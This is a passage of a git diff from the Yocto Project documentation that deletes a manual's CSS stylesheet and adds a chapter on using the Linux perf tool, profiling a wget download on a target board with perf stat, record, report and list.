-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/profile-manual/profile-manual-usage.rst b/documentation/profile-manual/profile-manual-usage.rst
new file mode 100644
index 0000000000..e389a13fc0
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-usage.rst
@@ -0,0 +1,2623 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. highlight:: shell
+
+***************************************************************
+Basic Usage (with examples) for each of the Yocto Tracing Tools
+***************************************************************
+
+|
+
+This chapter presents basic usage examples for each of the tracing
+tools.
+
+.. _profile-manual-perf:
+
+perf
+====
+
+The 'perf' tool is the profiling and tracing tool that comes bundled
+with the Linux kernel.
+
+Don't let the fact that it's part of the kernel fool you into thinking
+that it's only for tracing and profiling the kernel - you can indeed use
+it to trace and profile just the kernel, but you can also use it to
+profile specific applications separately (with or without kernel
+context), and you can also use it to trace and profile the kernel and
+all applications on the system simultaneously to gain a system-wide view
+of what's going on.
+
+In many ways, perf aims to be a superset of all the tracing and
+profiling tools available in Linux today, including all the other tools
+covered in this HOWTO. The past couple of years have seen perf subsume a
+lot of the functionality of those other tools and, at the same time,
+those other tools have removed large portions of their previous
+functionality and replaced it with calls to the equivalent functionality
+now implemented by the perf subsystem. Extrapolation suggests that at
+some point those other tools will simply become completely redundant and
+go away; until then, we'll cover those other tools in these pages and in
+many cases show how the same things can be accomplished in perf and the
+other tools when it seems useful to do so.
+
+The coverage below details some of the most common ways you'll likely
+want to apply the tool; full documentation can be found either within
+the tool itself or in the man pages at
+`perf(1) <http://linux.die.net/man/1/perf>`__.
+
+.. _perf-setup:
+
+Perf Setup
+----------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+In particular, you'll get the most mileage out of perf if you profile an
+image built with the following in your ``local.conf`` file: ::
+
+ INHIBIT_PACKAGE_STRIP = "1"
+
+perf runs on the target system for the most part. You can archive
+profile data and copy it to the host for analysis, but for the rest of
+this document we assume you've ssh'ed to the host and will be running
+the perf commands on the target.
+
+.. _perf-basic-usage:
+
+Basic Perf Usage
+----------------
+
+The perf tool is pretty much self-documenting. To remind yourself of the
+available commands, simply type 'perf', which will show you basic usage
+along with the available perf subcommands: ::
+
+ root@crownbay:~# perf
+
+ usage: perf [--version] [--help] COMMAND [ARGS]
+
+ The most commonly used perf commands are:
+ annotate Read perf.data (created by perf record) and display annotated code
+ archive Create archive with object files with build-ids found in perf.data file
+ bench General framework for benchmark suites
+ buildid-cache Manage build-id cache.
+ buildid-list List the buildids in a perf.data file
+ diff Read two perf.data files and display the differential profile
+ evlist List the event names in a perf.data file
+ inject Filter to augment the events stream with additional information
+ kmem Tool to trace/measure kernel memory(slab) properties
+ kvm Tool to trace/measure kvm guest os
+ list List all symbolic event types
+ lock Analyze lock events
+ probe Define new dynamic tracepoints
+ record Run a command and record its profile into perf.data
+ report Read perf.data (created by perf record) and display the profile
+ sched Tool to trace/measure scheduler properties (latencies)
+ script Read perf.data (created by perf record) and display trace output
+ stat Run a command and gather performance counter statistics
+ test Runs sanity tests.
+ timechart Tool to visualize total system behavior during a workload
+ top System profiling tool.
+
+ See 'perf help COMMAND' for more information on a specific command.
+
+
+Using perf to do Basic Profiling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As a simple test case, we'll profile the 'wget' of a fairly large file,
+which is a minimally interesting case because it has both file and
+network I/O aspects, and at least in the case of standard Yocto images,
+it's implemented as part of busybox, so the methods we use to analyze it
+can be used in a very similar way to the whole host of supported busybox
+applets in Yocto. ::
+
+ root@crownbay:~# rm linux-2.6.19.2.tar.bz2; \
+ wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+The quickest and easiest way to get some basic overall data about what's
+going on for a particular workload is to profile it using 'perf stat'.
+'perf stat' basically profiles using a few default counters and displays
+the summed counts at the end of the run: ::
+
+ root@crownbay:~# perf stat wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% |***************************************************| 41727k 0:00:00 ETA
+
+ Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+ 4597.223902 task-clock # 0.077 CPUs utilized
+ 23568 context-switches # 0.005 M/sec
+ 68 CPU-migrations # 0.015 K/sec
+ 241 page-faults # 0.052 K/sec
+ 3045817293 cycles # 0.663 GHz
+ <not supported> stalled-cycles-frontend
+ <not supported> stalled-cycles-backend
+ 858909167 instructions # 0.28 insns per cycle
+ 165441165 branches # 35.987 M/sec
+ 19550329 branch-misses # 11.82% of all branches
+
+ 59.836627620 seconds time elapsed
+
+Many times such a simple-minded test doesn't yield much of
+interest, but sometimes it does (see Real-world Yocto bug (slow
+loop-mounted write speed)).
+
+Also, note that 'perf stat' isn't restricted to a fixed set of counters
+- basically any event listed in the output of 'perf list' can be tallied
+by 'perf stat'. For example, suppose we wanted to see a summary of all
+the events related to kernel memory allocation/freeing along with cache
+hits and misses: ::
+
+ root@crownbay:~# perf stat -e kmem:* -e cache-references -e cache-misses wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% |***************************************************| 41727k 0:00:00 ETA
+
+ Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+ 5566 kmem:kmalloc
+ 125517 kmem:kmem_cache_alloc
+ 0 kmem:kmalloc_node
+ 0 kmem:kmem_cache_alloc_node
+ 34401 kmem:kfree
+ 69920 kmem:kmem_cache_free
+ 133 kmem:mm_page_free
+ 41 kmem:mm_page_free_batched
+ 11502 kmem:mm_page_alloc
+ 11375 kmem:mm_page_alloc_zone_locked
+ 0 kmem:mm_page_pcpu_drain
+ 0 kmem:mm_page_alloc_extfrag
+ 66848602 cache-references
+ 2917740 cache-misses # 4.365 % of all cache refs
+
+ 44.831023415 seconds time elapsed
+
+So 'perf stat' gives us a nice easy
+way to get a quick overview of what might be happening for a set of
+events, but normally we'd need a little more detail in order to
+understand what's going on in a way that we can act on in a useful way.
+
+To dive down into a next level of detail, we can use 'perf record'/'perf
+report' which will collect profiling data and present it to use using an
+interactive text-based UI (or simply as text if we specify --stdio to
+'perf report').
+
+As our first attempt at profiling this workload, we'll simply run 'perf
+record', handing it the workload we want to profile (everything after
+'perf record' and any perf options we hand it - here none - will be
+executed in a new shell). perf collects samples until the process exits
+and records them in a file named 'perf.data' in the current working
+directory. ::
+
+ root@crownbay:~# perf record wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% |************************************************| 41727k 0:00:00 ETA
+ [ perf record: Woken up 1 times to write data ]
+ [ perf record: Captured and wrote 0.176 MB perf.data (~7700 samples) ]
+
+To see the results in a
+'text-based UI' (tui), simply run 'perf report', which will read the
+perf.data file in the current working directory and display the results
+in an interactive UI: ::
+
+ root@crownbay:~# perf report
+
+.. image:: figures/perf-wget-flat-stripped.png
+ :align: center
+
+The above screenshot displays a 'flat' profile, one entry for each
+'bucket' corresponding to the functions that were profiled during the
+profiling run, ordered from the most popular to the least (perf has
+options to sort in various orders and keys as well as display entries
+only above a certain threshold and so on - see the perf documentation
+for details). Note that this includes both userspace functions (entries
+containing a [.]) and kernel functions accounted to the process (entries
+containing a [k]). (perf has command-line modifiers that can be used to
+restrict the profiling to kernel or userspace, among others).
+
+Notice also that the above report shows an entry for 'busybox', which is
+the executable that implements 'wget' in Yocto, but that instead of a
+useful function name in that entry, it displays a not-so-friendly hex
+value instead. The steps below will show how to fix that problem.
+
+Before we do that, however, let's try running a different profile, one
+which shows something a little more interesting. The only difference
+between the new profile and the previous one is that we'll add the -g
+option, which will record not just the address of a sampled function,
+but the entire callchain to the sampled function as well: ::
+
+ root@crownbay:~# perf record -g wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+ Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+ linux-2.6.19.2.tar.b 100% |************************************************| 41727k 0:00:00 ETA
+ [ perf record: Woken up 3 times to write data ]
+ [ perf record: Captured and wrote 0.652 MB perf.data (~28476 samples) ]
+
+
+ root@crownbay:~# perf report
+
+.. image:: figures/perf-wget-g-copy-to-user-expanded-stripped.png
+ :align: center
+
+Using the callgraph view, we can actually see not only which functions
+took the most time, but we can also see a summary of how those functions
+were called and learn something about how the program interacts with the
+kernel in the process.
+
+Notice that each entry in the above screenshot now contains a '+' on the
+left-hand side. This means that we can expand the entry and drill down
+into the callchains that feed into that entry. Pressing 'enter' on any
+one of them will expand the callchain (you can also press 'E' to expand
+them all at the same time or 'C' to collapse them all).
+
+In the screenshot above, we've toggled the ``__copy_to_user_ll()`` entry
+and several subnodes all the way down. This lets us see which callchains
+contributed to the profiled ``__copy_to_user_ll()`` function which
+contributed 1.77% to the total profile.
+
+As a bit of background explanation for these callchains, think about
+what happens at a high level when you run wget to get a file out on the
+network. Basically what happens is that the data comes into the kernel
+via the network connection (socket) and is passed to the userspace
+program 'wget' (which is actually a part of busybox, but that's not
+important for now), which takes the buffers the kernel passes to it and
+writes it to a disk file to save it.
+
+The part of this process that we're looking at in the above call stacks
+is the part where the kernel passes the data it's read from the socket
+down to wget i.e. a copy-to-user.
+
+Notice also that here there's also a case where the hex value is
+displayed in the callstack, here in the expanded ``sys_clock_gettime()``
+function. Later we'll see it resolve to a userspace function call in
+busybox.
+
+.. image:: figures/perf-wget-g-copy-from-user-expanded-stripped.png
+ :align: center
+
+The above screenshot shows the other half of the journey for the data -
+from the wget program's userspace buffers to disk. To get the buffers to
+disk, the wget program issues a ``write(2)``, which does a ``copy-from-user`` to
+the kernel, which then takes care via some circuitous path (probably
+also present somewhere in the profile data), to get it safely to disk.
+
+Now that we've seen the basic layout of the profile data and the basics
+of how to extract useful information out of it, let's get back to the
+task at hand and see if we can get some basic idea about where the time
+is spent in the program we're profiling, wget. Remember that wget is
+actually implemented as an applet in busybox, so while the process name
+is 'wget', the executable we're actually interested in is busybox. So
+let's expand the first entry containing busybox:
+
+.. image:: figures/perf-wget-busybox-expanded-stripped.png
+ :align: center
+
+Again, before we expanded we saw that the function was labeled with a
+hex value instead of a symbol as with most of the kernel entries.
+Expanding the busybox entry doesn't make it any better.
+
+The problem is that perf can't find the symbol information for the
+busybox binary, which is actually stripped out by the Yocto build
+system.
+
+One way around that is to put the following in your ``local.conf`` file
+when you build the image: ::
+
+ INHIBIT_PACKAGE_STRIP = "1"
+
+However, we already have an image with the binaries stripped, so
+what can we do to get perf to resolve the symbols? Basically we need to
+install the debuginfo for the busybox package.
+
+To generate the debug info for the packages in the image, we can add
+``dbg-pkgs`` to :term:`EXTRA_IMAGE_FEATURES` in ``local.conf``. For example: ::
+
+ EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
+
+Additionally, in order to generate the type of debuginfo that perf
+understands, we also need to set
+:term:`PACKAGE_DEBUG_SPLIT_STYLE`
+in the ``local.conf`` file: ::
+
+ PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
+
+Once we've done that, we can install the
+debuginfo for busybox. The debug packages once built can be found in
+``build/tmp/deploy/rpm/*`` on the host system. Find the busybox-dbg-...rpm
+file and copy it to the target. For example: ::
+
+ [trz@empanada core2]$ scp /home/trz/yocto/crownbay-tracing-dbg/build/tmp/deploy/rpm/core2_32/busybox-dbg-1.20.2-r2.core2_32.rpm root@192.168.1.31:
+ busybox-dbg-1.20.2-r2.core2_32.rpm 100% 1826KB 1.8MB/s 00:01
+
+Now install the debug rpm on the target: ::
+
+ root@crownbay:~# rpm -i busybox-dbg-1.20.2-r2.core2_32.rpm
+
+Now that the debuginfo is installed, we see that the busybox entries now display
+their functions symbolically:
+
+.. image:: figures/perf-wget-busybox-debuginfo.png
+ :align: center
+
+If we expand one of the entries and press 'enter' on a leaf node, we're
+presented with a menu of actions we can take to get more information
+related to that entry:
+
+.. image:: figures/perf-wget-busybox-dso-zoom-menu.png
+ :align: center
+
+One of these actions allows us to show a view that displays a
+busybox-centric view of the profiled functions (in this case we've also
+expanded all the nodes using the 'E' key):
+
+.. image:: figures/perf-wget-busybox-dso-zoom.png
+ :align: center
+
+Finally, we can see that now that the busybox debuginfo is installed,
+the previously unresolved symbol in the ``sys_clock_gettime()`` entry
+mentioned previously is now resolved, and shows that the
+sys_clock_gettime system call that was the source of 6.75% of the
+copy-to-user overhead was initiated by the ``handle_input()`` busybox
+function:
+
+.. image:: figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
+ :align: center
+
+At the lowest level of detail, we can dive down to the assembly level
+and see which instructions caused the most overhead in a function.
+Pressing 'enter' on the 'udhcpc_main' function, we're again presented
+with a menu:
+
+.. image:: figures/perf-wget-busybox-annotate-menu.png
+ :align: center
+
+Selecting 'Annotate udhcpc_main', we get a detailed listing of
+percentages by instruction for the udhcpc_main function. From the
+display, we can see that over 50% of the time spent in this function is
+taken up by a couple tests and the move of a constant (1) to a register:
+
+.. image:: figures/perf-wget-busybox-annotate-udhcpc.png
+ :align: center
+
+As a segue into tracing, let's try another profile using a different
+counter, something other than the default 'cycles'.
+
+The tracing and profiling infrastructure in Linux has become unified in
+a way that allows us to use the same tool with a completely different
+set of counters, not just the standard hardware counters that
+traditional tools have had to restrict themselves to (of course the
+traditional tools can also make use of the expanded possibilities now
+available to them, and in some cases have, as mentioned previously).
+
+We can get a list of the available events that can be used to profile a
+workload via 'perf list': ::
+
+ root@crownbay:~# perf list
+
+ List of pre-defined events (to be used in -e):
+ cpu-cycles OR cycles [Hardware event]
+ stalled-cycles-frontend OR idle-cycles-frontend [Hardware event]
+ stalled-cycles-backend OR idle-cycles-backend [Hardware event]
+ instructions [Hardware event]
+ cache-references [Hardware event]
+ cache-misses [Hardware event]
+ branch-instructions OR branches [Hardware event]
+ branch-misses [Hardware event]
+ bus-cycles [Hardware event]
+ ref-cycles [Hardware event]
+
+ cpu-clock [Software event]
+ task-clock [Software event]
+ page-faults OR faults [Software event]
+ minor-faults [Software event]
+ major-faults [Software event]
+ context-switches OR cs [Software event]
+ cpu-migrations OR migrations [Software event]
+ alignment-faults [Software event]
+ emulation-faults [Software event]
+
+ L1-dcache-loads [Hardware cache event]
+ L1-dcache-load-misses [Hardware cache event]
+ L1-dcache-prefetch-misses [Hardware cache event]
+ L1-icache-loads [Hardware cache event]
+ L1-icache-load-misses [Hardware cache event]
+ .
+ .
+ .
+ rNNN [Raw hardware event descriptor]
+ cpu/t1=v1[,t2=v2,t3 ...]/modifier [Raw hardware event descriptor]
+ (see 'perf list --help' on how to encode it)
+
+ mem:<addr>[:access] [Hardware breakpoint]
+
+ sunrpc:rpc_call_status [Tracepoint event]
+ sunrpc:rpc_bind_status [Tracepoint event]
+ sunrpc:rpc_connect_status [Tracepoint event]
+ sunrpc:rpc_task_begin [Tracepoint event]
+ skb:kfree_skb [Tracepoint event]
+ skb:consume_skb [Tracepoint event]
+ skb:skb_copy_datagram_iovec [Tracepoint event]
+ net:net_dev_xmit [Tracepoint event]
+ net:net_dev_queue [Tracepoint event]
+ net:netif_receive_skb [Tracepoint event]
+ net:netif_rx [Tracepoint event]
+ napi:napi_poll [Tracepoint event]
+ sock:sock_rcvqueue_full [Tracepoint event]
+ sock:sock_exceed_buf_limit [Tracepoint event]
+ udp:udp_fail_queue_rcv_skb [Tracepoint event]
+ hda:hda_send_cmd [Tracepoint event]
+ hda:hda_get_response [Tracepoint event]
+ hda:hda_bus_reset [Tracepoint event]
+ scsi:scsi_dispatch_cmd_start [Tracepoint event]
+ scsi:scsi_dispatch_cmd_error [Tracepoint event]
+ scsi:scsi_eh_wakeup [Tracepoint event]
+ drm:drm_vblank_event [Tracepoint event]
+ drm:drm_vblank_event_queued [Tracepoint event]
+ drm:drm_vblank_event_delivered [Tracepoint event]
+ random:mix_pool_bytes [Tracepoint event]
+ random:mix_pool_bytes_nolock [Tracepoint event]
+ random:credit_entropy_bits [Tracepoint event]
+ gpio:gpio_direction [Tracepoint event]
+ gpio:gpio_value [Tracepoint event]
+ block:block_rq_abort [Tracepoint event]
+ block:block_rq_requeue [Tracepoint event]
+ block:block_rq_issue [Tracepoint event]
+ block:block_bio_bounce [Tracepoint event]
+ block:block_bio_complete [Tracepoint event]
+ block:block_bio_backmerge [Tracepoint event]
+ .
+ .
+ writeback:writeback_wake_thread [Tracepoint event]
+ writeback:writeback_wake_forker_thread [Tracepoint event]
+ writeback:writeback_bdi_register [Tracepoint event]
+ .
+ .
+ writeback:writeback_single_inode_requeue [Tracepoint event]
+ writeback:writeback_single_inode [Tracepoint event]
+ kmem:kmalloc [Tracepoint event]
+ kmem:kmem_cache_alloc [Tracepoint event]
+ kmem:mm_page_alloc [Tracepoint event]
+ kmem:mm_page_alloc_zone_locked [Tracepoint event]
+ kmem:mm_page_pcpu_drain [Tracepoint event]
+ kmem:mm_page_alloc_extfrag [Tracepoint event]
+ vmscan:mm_vmscan_kswapd_sleep [Tracepoint event]
+ vmscan:mm_vmscan_kswapd_wake [Tracepoint event]
+ vmscan:mm_vmscan_wakeup_kswapd [Tracepoint event]
+ vmscan:mm_vmscan_direct_reclaim_begin [Tracepoint event]
+ .
+ .
+ module:module_get [Tracepoint event]
+ module:module_put [Tracepoint event]
+ module:module_request [Tracepoint event]
+ sched:sched_kthread_stop [Tracepoint event]
+ sched:sched_wakeup [Tracepoint event]
+ sched:sched_wakeup_new [Tracepoint event]
+ sched:sched_process_fork [Tracepoint event]
+ sched:sched_process_exec [Tracepoint event]
+ sched:sched_stat_runtime [Tracepoint event]
+ rcu:rcu_utilization [Tracepoint event]
+ workqueue:workqueue_queue_work [Tracepoint event]
+ workqueue:workqueue_execute_end [Tracepoint event]
+ signal:signal_generate [Tracepoint event]
+ signal:signal_deliver [Tracepoint event]
+ timer:timer_init [Tracepoint event]
+ timer:timer_start [Tracepoint event]
+ timer:hrtimer_cancel [Tracepoint event]
+ timer:itimer_state [Tracepoint event]
+ timer:itimer_expire [Tracepoint event]
+ irq:irq_handler_entry [Tracepoint event]
+ irq:irq_handler_exit [Tracepoint event]
+ irq:softirq_entry [Tracepoint event]
+ irq:softirq_exit [Tracepoint event]
+ irq:softirq_raise [Tracepoint event]
+ printk:console [Tracepoint event]
+ task:task_newtask [Tracepoint event]
+ task:task_rename [Tracepoint event]
+ syscalls:sys_enter_socketcall [Tracepoint event]
+ syscalls:sys_exit_socketcall [Tracepoint event]
+ .
+ .
+ .
+ syscalls:sys_enter_unshare [Tracepoint event]
+ syscalls:sys_exit_unshare [Tracepoint event]
+ raw_syscalls:sys_enter [Tracepoint event]
+ raw_syscalls:sys_exit [Tracepoint event]
+
+.. admonition:: Tying it Together
+
+ These are exactly the same set of events defined by the trace event
+ subsystem and exposed by ftrace/tracecmd/kernelshark as files in
+ /sys/kernel/debug/tracing/events, by SystemTap as
+ kernel.trace("tracepoint_name") and (partially) accessed by LTTng.
+
+Only a subset of these would be of interest to us when looking at this
+workload, so let's choose the most likely subsystems (identified by the
+string before the colon in the Tracepoint events) and do a 'perf stat'
+run using only those wildcarded subsystems: ::
+
+ root@crownbay:~# perf stat -e skb:* -e net:* -e napi:* -e sched:* -e workqueue:* -e irq:* -e syscalls:* wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+ Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+ 23323 skb:kfree_skb
+ 0 skb:consume_skb
+ 49897 skb:skb_copy_datagram_iovec
+ 6217 net:net_dev_xmit
+ 6217 net:net_dev_queue
+ 7962 net:netif_receive_skb
+ 2 net:netif_rx
+ 8340 napi:napi_poll
+ 0 sched:sched_kthread_stop
+ 0 sched:sched_kthread_stop_ret
+ 3749 sched:sched_wakeup
+ 0 sched:sched_wakeup_new
+ 0 sched:sched_switch
+ 29 sched:sched_migrate_task
+ 0 sched:sched_process_free
+ 1 sched:sched_process_exit
+ 0 sched:sched_wait_task
+ 0 sched:sched_process_wait
+ 0 sched:sched_process_fork
+ 1 sched:sched_process_exec
+ 0 sched:sched_stat_wait
+ 2106519415641 sched:sched_stat_sleep
+ 0 sched:sched_stat_iowait
+ 147453613 sched:sched_stat_blocked
+ 12903026955 sched:sched_stat_runtime
+ 0 sched:sched_pi_setprio
+ 3574 workqueue:workqueue_queue_work
+ 3574 workqueue:workqueue_activate_work
+ 0 workqueue:workqueue_execute_start
+ 0 workqueue:workqueue_execute_end
+ 16631 irq:irq_handler_entry
+ 16631 irq:irq_handler_exit
+ 28521 irq:softirq_entry
+ 28521 irq:softirq_exit
+ 28728 irq:softirq_raise
+ 1 syscalls:sys_enter_sendmmsg
+ 1 syscalls:sys_exit_sendmmsg
+ 0 syscalls:sys_enter_recvmmsg
+ 0 syscalls:sys_exit_recvmmsg
+ 14 syscalls:sys_enter_socketcall
+ 14 syscalls:sys_exit_socketcall
+ .
+ .
+ .
+ 16965 syscalls:sys_enter_read
+ 16965 syscalls:sys_exit_read
+ 12854 syscalls:sys_enter_write
+ 12854 syscalls:sys_exit_write
+ .
+ .
+ .
+
+ 58.029710972 seconds time elapsed
+
+
+
+Let's pick one of these tracepoints
+and tell perf to do a profile using it as the sampling event: ::
+
+ root@crownbay:~# perf record -g -e sched:sched_wakeup wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+.. image:: figures/sched-wakeup-profile.png
+ :align: center
+
+The screenshot above shows the results of running a profile using
